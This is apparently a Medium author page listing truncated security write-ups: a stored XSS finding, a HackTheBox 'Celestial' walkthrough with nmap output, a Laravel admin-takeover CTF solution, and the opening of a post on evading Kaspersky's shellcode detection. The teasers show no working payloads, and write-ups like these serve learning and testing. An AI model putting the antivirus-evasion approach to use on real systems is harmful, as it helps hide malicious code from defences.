Image for post
Image for post

Hello security wizards,

I hope you are fine and healthy during these hard times, Recently during testing I discovered an Stored Cross-Site Scripting rated 5.9(Medium) using CVSS v3.1 risk calculator and wanted to share my methodology of how I found it .

Background

The Application I’ve tested was a generic survey system where administrators could create surveys and logged users could complete surveys .

The Discovery

Before talking about the Discovery , I would like to explain how in my opinion web applications are secured against XSS vulnerabilities .

So here we will be talking about Stored/Reflected XSS only which are quite similar except that in a Stored XSS vulnerability our payload such…


Hello folks . here I will describe step by step how to get root on Celestial which has been retired .

Image for post
Image for post

the IP address of the box is 10.10.10.85

Enumeration

root@h4d3s:~# nmap -sT -T5 -A 10.10.10.85 
Starting Nmap 7.70 ( https://nmap.org ) at 2018–05–12 16:48 CEST
Nmap scan report for 10.10.10.85
Host is up (0.027s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
3000/tcp open http Node.js Express framework
|_http-title: Site doesn’t have a title (text/html; charset=utf-8).
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.2–4.9 (95%), Linux 3.8–3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal). …

Hello readers,

I recently had the chance to try a web security challenge called ‘Admin Panel Takeover — 1’ made by @syed__umar and written using Laravel PHP framework .Like the title says ,the goal of the challenge is to take over the admin account of the application.

**** If you want to try it , stop reading right now because this post will contain the solution ****

Lab setup

To try the challenge you need to have Docker installed and started(docker service) in your machine and run the following command to get the Web Application running :

sudo docker run -it — rm uexpl0it/admin-panel-takeover:latest…


Hello readers !

I am Hadi , a 17 years old security enthusiast .

While I was playing with Kaspersky Lab 2017 free version, I tried various shellcodes from Metasploit Framework , unfortunalety Kaspersky Antivirus detected them all but I discovered a way to evade Kaspersky’s Shellcode detection ..

Basically let’s try with a shellcode wrapper which uses ‘Windows.h’ library and VirtualAlloc() function ( which allocate new memory and store our shellcode in it ,in this way we will not have issues with Data Execution Protection .. ) in this write-up I will use ‘windows/x64/exec’ shellcode to spawn a calc.exe :-) . …

About

Hadi Mene

hello world

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store